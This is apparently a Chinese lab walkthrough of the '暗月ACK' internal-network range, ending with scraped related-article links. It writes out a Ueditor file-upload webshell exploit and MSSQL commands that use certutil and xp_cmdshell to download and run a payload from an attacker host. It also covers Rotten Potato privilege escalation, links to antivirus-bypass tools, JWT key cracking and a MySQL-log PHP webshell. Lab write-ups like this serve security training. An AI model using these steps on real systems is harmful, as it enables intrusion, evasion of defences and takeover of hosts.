暗月ACK靶场 WP
环境搭建
https://mp.weixin.qq.com/s/VB4elHdrHNCmPDP_ktcLRg
https://www.bilibili.com/video/BV1264y187St?spm_id_from=333.1007.top_right_bar_window_history.content.click
按照文章拓扑根据实际情况搭建好,web2的其中一个网卡需要自己调一下ip
1、把 12server-web1 中 C:Hws.com/Hws/HostMaster/wwwroot/www.ackmoon.com/web/HdhApp.config 的 ip 地址换成 12server-data1 的地址
2、攻击机绑定host文件,192.168.59.130 ackmoon.com
挑战开始
任务:拿到五个主机权限
信息搜集
开了一些端口,先看web服务,是一个HDH网站管理系统(HDHCMS),查看历史漏洞没有发现有用的,访问其他的的web服务也没发现,只能使劲撸这个cms了
后台路径:http://ackmoon.com/admin/login.aspx,爆破之后没发现弱口令,但是可以自己注册用户
登录发现一些信息,物理路径、数据库、上传目录、编辑器
Ueditor漏洞利用
Ueditor 1.4.3有个文件上传漏洞,具体操作如下:
使用冰蝎和一张图片制作图片马
本地写一个上传木马的脚本
<form action="http://ackmoon.com/admin/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
将图片马上传到服务器上,开启http服务,木马的路径为 http://1.12.x.x/ok.png?.aspx,点击上传会返回shell的地址
使用冰蝎连接,查看权限后发现权限很低,得用cs进行提权才能找flag等操作
CS提权横向
./teamserver 1.12.x.x 123456 客户端填好服务器地址和密码连接即可
上传的马执行直接没,猜测应该是360杀掉了,登录靶机一看好家伙,全给我删了。就连powershell执行都被拦截了
继续研究了几天发现之前的掩日已经绕不过360,只能找别的办法,后面在github上找了几个Bypass的cs插件,发现其中一个可以绕过360的检测,地址为 https://github.com/cseroad/bypassAV。(后续补充一下免杀的学习内容)
按作者的使用教程生成木马,冰蝎占用内存较大(当你的电脑开着几个虚拟机和应用时内存会不够用)执行命令有时候会失败,所以新增了一个aspx一句话用蚁剑连接。将木马上传到 C:/Windows/Temp 目录下,其他目录因为权限问题可能上传不了。蚁剑执行木马,360也没有拦截的记录,成功在cs获得shell。
接下来就是提权,推荐插件 https://github.com/d3ckx1/OLa,内集成多个提权插件,用烂土豆(Rotten Potato) MS16-075成功提权到SYSTEM权限
一般来说得到SYSTEM权限可以看看主机有没有开启3389,新增一个用户登录就行,但是这个靶机没有开启,利用这个靶机当作跳板进行内网渗透即可。
查看网卡信息可知主机为双网卡,我们现在处于192.168.59.1/24这个网段,下一个网段是192.168.22.1/24,需要在此网段寻找其他的机子。
查看主机的arp表可以获取处于同一网段的主机,发现了192.168.22.129、133两个主机,使用该主机也都ping通,存活状态
之前在蚁剑中查看数据库文件的时候看到过133的主机ip,也就是说改站点和133的主机是站库分离,133专门运行数据库,为sqlserver。账号密码为:sa:pass123@.com
添加socks代理进入内网,ip为cs服务端的ip,端口4567
mssql获取权限
本地使用Proxifier工具连接代理服务器,再使用数据库连接工具连接133的数据库,通过数据库getshell
查看xp_cmdshell的状态
exec sp_configure;
按理来说应该是关闭的,但是这里显示已经开启了,我们直接执行命令即可。原本想通过cs生成的powershell命令直接上线主机但是一直没反应,查看进程发现一个火绒再运行,登录靶机一看全被拦截了
绕过方式见:https://xz.aliyun.com/t/9265,免杀木马制作:https://github.com/xinghe0/python-shellcode-loader
#开启相应的权限
exec sp_configure 'show advanced options', 1;
RECONFIGURE;
exec sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;#移动sethc
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\certutil.exe' ,'c:\windows\temp\sethc.exe';#下载免杀木马
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\Temp\sethc.exe -urlcache -split -f "http://1.x.x.x:4446/ob.exe" C:\Windows\Temp\ob.exe';#运行木马
exec master..xp_cmdshell 'C:/windows/temp/ob.exe';
成功上线cs
权限太低,继续烂土豆(Rotten Potato) MS16-075提权,到这里已经拿下133的主机了,查看路由表也是发现了前面web那台arp缓存的另一台主机ip
192.168.22.129的
JWT+mysql日志getshell
使用fscan进行扫描的时候发现129运行着web服务
浏览器添加代理后访问129,访问web站点
这里考察的是jwt的攻击方式,文章见:https://mp.weixin.qq.com/s/WvVgavjJMXSZQsVFtHEOhA?vid=1688855618368326&deviceid=e41dee7e-b83b-4610-8a9a-e648ac6ca813&version=4.0.20.6020&platform=win
试了修改用户名admin重新生成x-token来替换demo用户绕过,发现这个系统校验签名。又试了将alg设置为 None 重新签名发送也失败了。只剩下了爆破密钥的方式,但是字典看了别人的解析才知道是kali里面的rockyou.txt
爆破工具:https://github.com/ticarpi/jwt_tool,密钥为:Qweasdzxc5
后面以为这个密钥是突破jwt的关键点,没想到这个靶场把这个密钥设置为http://192.168.22.129/phpmyadmin4.8.5/index.php的登录密码,感觉逻辑上有些迷。登录后就是mysql日志 getshell那一套。
#查看日志路径、开启日志、设置日志文件、写入木马
SHOW VARIABLES LIKE 'general%'
SET GLOBAL general_log='ON'
SET GLOBAL general_log_file='C:/phpStudy_pro/WWW/s.php'
SELECT '<?php @eval($_POST["a"]);?>'
蚁剑连接(挂代理,后续需要和129进行交互的都要挂上代理),发现新网段,并且不出网
在cs上新建一个正向监听器并生成木马(beacon tcp)
用蚁剑上传到服务器执行,cs转发,成功获取shell
5.exe #在服务器中执行
connect 192.168.22.129 443 #在128会话中执行
shell ipconfig /all # 发现主机在域内,域名为ack123.com
shell ping ack123.com #定位域控的ip为10.10.10.135
SPN利用
因环境问题没法复现,题解参考:https://blog.csdn.net/qq_38850916/article/details/124801004 的kerberost攻击部分
总结
该靶机在搭建的时候会有部分问题,不知道是不是靶机主后续又对其进行修改,但是其中的免杀、代理等内容还是很贴切实战的。自己对内网域渗透这部分了解的还不够透彻,毕竟也不是专门搞红队的,以后若有机会会多多接触。
暗月ACK靶场 WP相关推荐
- 红日安全attck靶场7 内网靶场 WP
记一次中型靶场getshell全过程,难度适中,很有意思 这里用kali来模拟外网攻击机,其实用自己服务器也完全ok 个人认为,此方法比官方wp要好懂一些 首先是靶场地址 靶场 先看拓扑图因为环境要提 ...
- 【春秋云境】CVE-2015-1427靶场wp
elasticsearch 代码执行 (CVE-2015-1427) 一.漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍 ...
- 墨者学院在线靶场WP
文章目录 一.内部文件上传系统漏洞分析溯源 过程 原理 二.uWSGI 漏洞复现(CVE-2018-7490) 过程 原理 三.Webmin未经身份验证的远程代码执行 过程 原理 四.Ruby On ...
- pikachu漏洞平台靶场练习 总结 wp
每日学习 每日持续更新ing~ 之前一直都是在CTF刷题,感觉平常还是要打打靶场,学习一下实战环境啊~ 结合靶场视频:https://www.bilibili.com/video/BV1Y7411f7 ...
- 【靶场补充】项目十二补充(shellshock原理)
补充:关于项目12shellshock原理以及与CGI的利用原理 靶场WP地址
- 春秋云境系列靶场记录(合集)-不再更新
春秋云境系列靶场记录 春秋云境系列靶场记录合集,不更新了哈~~~ 2023/1/17日记 感谢各位朋友的关注,2022年11月到12月,利用空闲时间做了春秋云镜的靶场,因为穷,所以也只能做免费的(当然 ...
- 从Flask入门SSTI
文章目录 flask基本知识 字符串形式返回 render_template render_template_string SSTI 攻击链构造 靶场通关记录 level1(无WAF) 基类 -- 子 ...
- 【暗月内网靶场】项目六(简单的内网靶场)
暗月内网靶场 在这个项目中可以学到 如何搭建一个隧道 如何利用低版本的域环境 如何进行权限维持(影子账户,黄金票据)
- 暗月渗透实战靶场-项目六(上)
暗月渗透实战靶场-项目六 环境搭建 使用的是暗月提供的环境 直接虚拟机运行即可 设置网络环境 网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境 00x1-信息搜集 我们已经知道目标 ...
最新文章
- 机器学习——使用Apriori算法进行关联分析
- There is no isNullOrEmpty for collections in Guawa
- 比英伟达便宜4000元、功耗更低、游戏性能相同,AMD发布RX 6900 XT旗舰显卡
- 时间序列挖掘-预测算法-三次指数平滑法(Holt-Winters)——三次指数平滑算法可以很好的保存时间序列数据的趋势和季节性信息...
- 恢复WORD2010的默认模板2011-05-03
- Python numpy生成矩阵、串联矩阵
- java 素数乘积,求助2424379123 = 两个素数的乘积,求这两个素数?
- 谷歌浏览器安装过程-0223
- 单进程gevent版-TCP服务器(python 版)
- 今晚7点30,腾讯专家与你共探广告智能创意新可能
- python 求组合数最快方法_快速计算投资组合波动率的方法
- linux好用的下载工具,四款linux下的好工具
- js 计算时间差 函数
- python桌面程序臃肿_危险的转变:Python正在从简明转向臃肿,从实用转向媚俗
- D:\ProgramData\Anaconda3\envs\test_onnx\python.exe: No module named pip
- 泰坦尼克号幸存者的预测
- Qt编写自定义控件37-发光按钮(会呼吸的痛)
- 计算机如果没有什么 就无法启动,电脑开机没有任何反应
- 17个最好用的iPhone数据恢复工具【2019更新】
- 基于PyQt5实现界面控件自适应大小
热门文章
- php字符串类型详解,php数字类型之字符串类型详解_PHP教程
- Excel--Powerquery表格中按月份 业绩汇总
- GH1131铁基高温合金热强性如何
- web前端开发技术实验与实践(第三版)储久良编著 项目8 设计制度宣传展板
- FPGA定点小数二进制乘法运算
- 解决excel报错the setup controller has encountered a problem during install
- 计算机基础考核方案,计算机应用基础考核实施方案
- linux操作系统测试面试题,软件测试进阶面试题之Linux基础
- 在人间已是颠,何苦还要上青天
- office钓鱼免杀宏的制作